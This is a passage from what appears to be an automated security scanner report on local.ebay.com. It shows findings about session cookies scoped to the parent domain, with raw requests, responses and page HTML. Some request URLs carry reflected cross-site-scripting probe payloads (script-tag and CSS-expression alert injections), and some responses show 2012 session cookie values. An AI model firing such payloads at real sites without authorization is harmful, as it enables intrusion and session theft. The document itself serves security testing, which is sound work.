function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89d4b4-->

2.19. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/ HTTP/1.1
Referer: http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ef9b03a124f3=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89d452
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOBYWM4OWQ0NTIxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MjEA7gCxTwaTgWh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sLV9ua3c9eHNzJl9sb2NhdGlvbj03NTIxNyZfZnBvcz03NTIxNyZfdHJrc2lkPXA1NzkxLm0xJmRjMTNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgxJTI5JTNDLz9fbmt3PSZfZnBvcz03NTIxNyZfZmxwcmFkPTI1LjAmX2NhdGlkPaYCmRA*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OBYWM4OWQ0NTIxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MjEAywABTwVJCTEW3rT2; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 22245
Date: Thu, 05 Jan 2012 06:24:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - </title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325727602221" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325727602221;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AhdYeGIs*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs"></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="0"><div></div><div style="clear:both"></div><div style="padding:10px 0"><div class="smm-s smm-e"><div class="sm-imc smm-imc"><b class="g-hdn">error</b><div class="smm-cnt">Your search returned 0 results</div></div></div></div></div></div><div></div><div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab85d6541340a5e1a8678da7ff8b28bf");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height:100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89d452-->

2.20. http://local.ebay.com/local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac89d3de
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
